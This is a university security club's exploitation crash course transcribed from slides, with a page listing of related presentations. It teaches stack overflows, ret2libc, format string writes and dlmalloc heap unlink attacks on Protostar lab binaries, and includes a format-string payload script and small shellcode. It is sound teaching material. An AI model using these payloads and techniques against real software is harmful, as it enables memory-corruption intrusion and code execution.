Cloud talkCloud talk
Cloud talk
 
UTD Computer Security Group - Cracking the domain
UTD Computer Security Group - Cracking the domainUTD Computer Security Group - Cracking the domain
UTD Computer Security Group - Cracking the domain
 
Forensics audio and video
Forensics audio and videoForensics audio and video
Forensics audio and video
 
Computer networks and network security
Computer networks and network securityComputer networks and network security
Computer networks and network security
 
Intro to python
Intro to pythonIntro to python
Intro to python
 
Powershell crash course
Powershell crash coursePowershell crash course
Powershell crash course
 
Intro to cybersecurity
Intro to cybersecurityIntro to cybersecurity
Intro to cybersecurity
 
Intro to Bash
Intro to BashIntro to Bash
Intro to Bash
 
Web Exploitation
Web ExploitationWeb Exploitation
Web Exploitation
 
Network Exploitation
Network ExploitationNetwork Exploitation
Network Exploitation
 
Penetration Testing: Celestial
Penetration Testing: CelestialPenetration Testing: Celestial
Penetration Testing: Celestial
 
Introduction to Exploitation
Introduction to ExploitationIntroduction to Exploitation
Introduction to Exploitation
 
Cryptography Crash Course
Cryptography Crash CourseCryptography Crash Course
Cryptography Crash Course
 
Fuzzing - Part 2
Fuzzing - Part 2Fuzzing - Part 2
Fuzzing - Part 2
 
Fuzzing - Part 1
Fuzzing - Part 1Fuzzing - Part 1
Fuzzing - Part 1
 
Protostar VM - Heap3
Protostar VM - Heap3Protostar VM - Heap3
Protostar VM - Heap3
 
Heap Base Exploitation
Heap Base ExploitationHeap Base Exploitation
Heap Base Exploitation
 
Advanced Windows Exploitation
Advanced Windows ExploitationAdvanced Windows Exploitation
Advanced Windows Exploitation
 

Último

CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 

Último (20)

CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 

Linux 32-bit Exploitation Crash Course

  • 1. EXPLOITATION CRASH COURSE UTD Computer Security Group – Scott Hand www.utdcsg.org
  • 3. What we will cover  We are covering software exploitation in a Linux 32-bit environment  Topics  Buffer overflows (stack and heap)  Format string  Ret2libc
  • 4. Tools  Virtualization software  VMware Workstation or VMware Player (free)  Virtualbox (free)  Linux Environment  GDB  Editor (Vim, emacs, etc.)  Python
  • 5. Exploit-Exercises - Protostar  Great learning environment  Stack, heap, format string, etc. vulnerabilities  Can be downloaded and run from VMware or Virtualbox
  • 7. Linux Memory Structure  .text  Contains program instructions  Readable, executable, not writable  Heap  Contains dynamically allocated memory objects  Readable, writable, (usually) executable  Stack  Contains static variables and base pointers  Readable, writable, (sometimes) executable
  • 8. Stack  Grows down from 0xBFFFFFFF  Argv, Environment, and Auxiliary Vectors at base Stack Heap 0xbfffffff
  • 9. Stack Frame Contents of Stack Contents of Stack Stack Base (EBP) Stack Pointer (ESP)
  • 10. Common Register Conventions  ESP – Stack Pointer  EBP – Stack Frame Base Pointer  EIP – Instruction Pointer  EAX, EBX, ECX, EXD – Fairly widely used, often used as function arguments
  • 11. Function Calls  The x86 instruction CALL is used, which automatically does the following:  Put all the arguments onto the stack (right to left)  Put instruction pointer (EIP) onto stack  Now in the callee, push base pointer onto stack and set base pointer to stack pointer (function prologue)  Execute instructions in new function  Clean up locals  Set stack pointer to base and restore base pointer by popping the stack (function epilogue)
  • 12. Function Calls Visualized  Function A has a stack comprised of a base, contents, and a top (stack pointer) ESP EBP Stack Contents A Base A
  • 13. Function Calls Visualized  Function A calls Function B, so pushes its arguments and instruction pointer on the stack ESP Stack Contents A Base A EIP for A Arguments for B EBP
  • 14. Function Calls Visualized  Function B executes its prologue to set up its own stack frame. First, push the old EBP EBP for A Stack Contents A Base A EIP for A Arguments for B ESP EBP
  • 15. Function Calls Visualized  Now change EBP to ESP’s value. We have a new stack frame ESPEBPEBP for A Stack Contents A Base A EIP for A Arguments for B
  • 16. Function Calls Visualized  Function B sets up its own locals EBP EBP for A Stack Contents A Base A EIP for A Arguments for B Stack Contents B ESP
  • 17. Function Calls Visualized  On finishing, function B first cleans up locals EBP for A Stack Contents A Base A EIP for A Arguments for B ESPEBP
  • 18. Function Calls Visualized  Next, it enters its function epilogue, in which it restores the previous base pointer Stack Contents A Base A EIP for A Arguments for B EBP ESP
  • 19. Function Calls Visualized  Finally, the EIP is popped and execution continues at its location Stack Contents A Base A Arguments for B EBP ESP
  • 20. Function Calls Visualized  A does the rest of the cleanup Stack Contents A Base A EBP ESP
  • 22. Overview  Stack based buffer overflows occur when writing goes past the boundaries of local variables  Example: char buf[64]; strcpy(buf, argv[1]);  The previous example will overflow buf’s boundaries and write onto stack memory if argv[1] contains more than 64 bytes  This allows us to alter local variables and also change the execution of the program
  • 23. Altering Code Execution Flow  Since we can write over stack memory, we can write over the saved EIP address Stored EIP Stored EBP buf[64] Paddin g New EIP
  • 24. Demos – Stack1 through Stack4
  • 25. Stack Smashing  Now we want to achieve execution of arbitrary code  Instead of giving EIP the address of another function, we give it the address of our buffer  Our buffer contains machine code instructions (known as shellcode)  For reliability, we use 0x90 opcodes to pad before our shellcode, these are NOP instructions and execution will slide past them if it lands there
  • 27. Demo – Stack Smashing
  • 29. Overview  What happens if we’re working with a slightly more modern machine with non- executable stack memory?  Rather than write our own code to spawn a shell, let’s use libc!  We will use system() for the demonstration for simplicity, but bear in mind that system drops privileges, so execv() is needed for privilege escalation
  • 31. Where to put “/bin/sh”?  In buffer, after its address  Environment  Argv  Auxiliary Vectors  Anywhere else reliable
  • 34. Background  printf() and similar format string functions such as sprintf() are used for string interpolation in many languages including C  Intended use:  Give a string containing text and format flags  Format flags are replaced with arguments to printf  Example: printf(“%d %dn”, 3, 3+4); // Prints 3 7
  • 35. What could go wrong?  How are user provided strings printed?  Good: printf(“%s”, str);  Bad: printf(str);  Why is this important? The user could supply their own format flags and your program will trust it.  GCC will give a very stern warning if you try to do this
  • 36. What can we do with this?  Giving lots of flags will mean that variables will be pulled from the stack – even if they weren’t passed to printf  This leads to information leakage.  Lets look at an example…
  • 37. sf.c #include <stdio.h> int main(int argc, char *argv[]) { int a = 0xDEADBEEF; int b = 0xABCDABCD; int c = 0x12345678; printf(argv[1]); printf("n"); return 0; }
  • 38. sf.c Exploited  ./sf AAAA  Output: AAAA  ./sf AAAA%x  Output: AAAAb7fd7ff4  ./sf AAAA%x%x%x%x%x  Output: AAAAb7fd7ff48048450bffff7e8b7ec6365de adbeef
  • 39. sf.c Exploited  There one of the local variables. Is there an easier way?  ./sf AAAA%5$x  Output: AAAAdeadbeef  ./sf AAAA%6$x  Output: AAAAabcdabcd
  • 40. It gets worse  One of the flags, %n, has the following effect:  The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.  So now we can write where ever we want!  What’s the process?  First, put the address to write to in the payload  Increment the number of characters written using the %x flag with a number. Ex: %10x prints ten spaces.  Call %n on the appropriate stack byte containing the pointer  Repeat
  • 41. Example with sf.c – Finding offsets  Modified sf.c checks if a==c, so 0xabcdabcd needs to be replaced with 0xdeadbeef  First, find how many %x flags needed to reach your payload on the stack.  With our python harness to keep environment constant, we get 107  Looking in GDB gives an address of 0xbffffe58 for the the value 0xabcdabcd
  • 42. Example with sf.c – Calculations  The last byte should be 0xEF (239)  We’ve written 5 bytes (4 and the spam one we’re crafting), so we want to write 234 more  Due to having to pad our string with As to line the address up, our payload now looks like: x58xfexffxbfA%234x%108$n  Running this confirms that now there’s a 0x000000ef where 0xabcdabcd was  What now?
  • 43. Example with sf.c – 2 at a time  We could write the last byte, then the one before, and so on. This takes four writes, so it wastes shell code space. It clobbers the preceding byte, but we probably don’t care too much  Example: 00000000000000ef Wrote 0xEF 000000000000beef Wrote 0xBE 0000000000adbeef Wrote 0xAD 00000000deadbeef Wrote 0xDE
  • 44. Example with sf.c – Using hc  Luckily, adding h in front of n writes a 16-bit integer instead  For 0xdeadbeef, that means two writes. Increment by 48874, write the 0xbeef half, then increment that by 8126 to write the 0xdead half.  This all gets a bit messy and the addresses will start to shift around depending on the length of the exploit, so use a script to pad it to the same length every time.
  • 45. Example with sf.c – Script  After having to tweak addresses again, final payload building script: payload = “x38xfexffxbfx3axfexffxbfA%48870x%108$hn%8126x %109$hn” payload += "A" * (40 - len(sploit)) print payload  Running it, we see in gdb that we were successful, and we also get the victory message.
  • 46. Other nefarious uses  Overwrites return addresses  Overwrites GOT entries  Overwrite terminators to cause overflow  Write shellcode to non-stack memory  Leaking information to bypass ASLR
  • 47. Demo – Echoserver Format String
  • 49. Heap Overview  We learned about the stack. Programs store local variables there.  Heaps are for storing globals as well as variables too large for the stack  In Linux:  .data – Initialized globals  .bss – Uninitialized globals  Heap – Dynamically allocated space, grows upwards  Stack – Local variables, grows down
  • 50. Memory Allocation Data Structures  glibc uses a version of the popular dlmalloc algorithm  Memory is allocated in chunks. Each chunk is 8-byte aligned with a header and data.  Each chunk contains:  Size information before and after the chunk – Easy to combine chunks and allows bidirection traversal from any chunk. Trailer fields are sometimes omitted in recent implementations  Chunks are stored in a linked list of bins, sorted by size in continuous increments of 8 for sizes under 512. Over 512 can be any multiple of 8.  Upon freeing a chunk, it is combined with freed neighbors to lower fragmentation  The final “top” chunk is empty and its size records the remaining about of free space
  • 52. Some Consequences  Locality Preservation  Chunks allocated at the same time tend to be referenced similarly and have coexistent lifetimes  Important for good performance, reduces cache misses  A tweaked version of nearest-fit is used that results in consecutive blocks when there is space  This is good for us  Easy to create overflows, as memory allocated after vulnerable variables is often given to other variables nearby that may be for things such as function pointers or file paths
  • 53. Malloc Example  We want to see what the heap looks like as more memory is allocated  We will allocate three strings: a, b, c. Each is 32 bytes.  Code: char *a, *b, *c; a = malloc(32); b = malloc(32); c = malloc(32);  This will serve as an introduction to the heap3 problem
  • 54. First Allocation 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a Remaining Space: 0xFD9
  • 55. Second Allocation 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 32 Byte Data Chunk 2 b Remaining Space: 0xFB1
  • 56. Third Allocation 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 32 Byte Data Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 32 Byte Data Chunk 3 c Remaining Space: 0xF89
  • 57.  Now, the interesting (and exploitable) part involves the free() implementation in dlmalloc  Let’s examine the contents of memory after successive free() commands are executed.  Code: free(c); free(b); free(a); Free Example
  • 58. Before First Free 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “BBBB0” Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 “CCCC0” Chunk 3 c Remaining Space: 0xF89
  • 59. After First Free 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “BBBB0” Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
  • 60. After Second Free 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “0x0804c050” Chunk 2 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
  • 61. After Third Free 0x0804c000 8 Byte Size – 0x29 0x0804c008 “0x0804c028” Chunk 1 0x0804c028 8 Byte Size – 0x29 0x0804c030 “0x0804c050” Chunk 2 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
  • 62. Demos – Protostar Heap Problems
  • 63. Heap3  We know from Heap3’s description that it “introduces the Doug Lea Malloc (dlmalloc) and how heap meta data can be modified to change program execution.”  What metadata in particular?  Let’s review the process of freeing a chunk from the last presentation…
  • 64. Before First Free 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “BBBB0” Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 “CCCC0” Chunk 3 c Remaining Space: 0xF89
  • 65. After First Free 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “BBBB0” Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
  • 66. After Second Free 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “0x0804c050” Chunk 2 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
  • 67. After Third Free 0x0804c000 8 Byte Size – 0x29 0x0804c008 “0x0804c028” Chunk 1 0x0804c028 8 Byte Size – 0x29 0x0804c030 “0x0804c050” Chunk 2 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
  • 68. Free Algorithm on Chunk p 1. Load the chunk’s size as psize, previous chunk is p-psize 2. A few scenarios can occur, but what we’re interested in is the case in which the surrounding chunk is also free 3. To consolidate, call: unlink(nextchunk, bck, fwd)
  • 69. unlink(P, BK, FD) - Highlights … FD = P->fd; BK = P->bk; … FD->bk = BK; BK->fd = FD; …
  • 70. Disassembled… 0x80498fa <free+214>: mov edx,DWORD PTR [ebp-0x18] 0x80498fd <free+217>: mov DWORD PTR [eax+0xc],edx 0x8049900 <free+220>: mov eax,DWORD PTR [ebp-0x18] 0x8049903 <free+223>: mov edx,DWORD PTR [ebp-0x14] 0x8049906 <free+226>: mov DWORD PTR [eax+0x8],edx The underlined instructions correspond with the previous two lines in unlink. bk is 12 bytes offset, fd is 8 bytes offset.
  • 71. Exploit Idea  We overwrite the size information for our b pointer, so that when it tries to find the previous memory chunk (previously c), we point it elsewhere.  Giving it a negative size means it will go forward to a “fake” previous chunk with fd and bk of our choosing.
  • 72. Crafting the Fake Chunk  Give a size of 0xFFFFFFFC = -4 to chunk 2  This pushes it forward 4 bytes, so it will then look to b+16 for the bk pointer and b+12 for the forward pointer.  Adjusting for header, that means fd and bk will be 4 and 8 bytes into our body respectively  chunk2 = “BBBB”+word1+word2+”B”*20
  • 73. What Now?  So now we can:  Load word1’s address into the memory at location word2 + 8  Load word2’s address into the memory at location word1 + 12  Actually pretty restrictive, as word1 and word2 need to be able to serve as a pointer to a writable region as well as data to write
  • 74. Ideas  One word is the address of winner() – 12, the other is the stored EIP  Doesn’t work – We can’t write at winner() – 12   Overwrite the GOT entry for puts  Still doesn’t work. Any time we are trying to put winner()’s address somewhere, we can’t because that memory is not writable
  • 75. Better Idea  One word will be a pointer to stack memory, the other will be a pointer to the stored EIP  Both locations are writable  Our stack is executable, and our program arguments are there. Let’s just overflow chunk 3’s contents to store the payload.  Exploit strategy:  Hijack EIP and send it to the heap  Execute custom shellcode that goes to winner()  Victory!
  • 76. Writing the Shellcode  All we want our shellcode to do is jump to winner() and exit cleanly  There are some space considerations. Because of the double write, one byte gets clobbered after 16 bytes  Some trial-and-error shows that winner() returns to a location that’s under ESP in the stack as soon as our shellcode begins execution
  • 77. Payload Pseudocode  Pop the stack  Push original stored EIP  Push winner  Return Why do we push original stored EIP? It’s nice to avoid segfaulting when we can.
  • 78. Payload ASM Code POP eax PUSH 0xb7eadc76 PUSH 0x8048864 RET (Note: Your addresses may vary)
  • 79. Payload Shellcode “ x58x68x76xdcxeaxb7 ” . x68x64x88x04x08xc3 ” I used metasm for this. Does its work in 12 bytes.
  • 80. Slightly Nicer Shellcode  Something I use since originally giving the Heap3 presentation is the 0xEB opcode. It takes a single byte and jumps that far ahead.  So EB 06 would skip ahead 1 byte (and a half for the other half of this byte)
  • 81. Results Starting program: /opt/protostar/bin/heap3 `python ~/solutions/h3.py` dynamite failed? that wasn't too bad now, was it? @ 1329993598 Program exited with code 056.
  • 83. Future Reading  We didn’t cover any Windows exploitation. If you want to learn the tools and techniques for the Windows environment, check out the Corelan tutorials at: https://www.corelan.be/index.php/2009/07/19/ex ploit-writing-tutorial-part-1-stack-based-over flows /  We covered Ret2libc, but the next step in mitigation evasion, Return Oriented Programming (ROP) wasn’t covered. It’s worth it to read up on this, as it’s complex, but extremely powerful.
  • 84. Thanks for coming  Let me know if there are any questions  The next CSG Crash Course will cover Cryptography and will be at 2pm on September 22 in ECSS 2.415  Weekly meetings are 7pm on Wednesdays in ECSS 4.619  Come join one of our teams for the upcoming CSAW2012 Capture the Flag competition and put these skills to use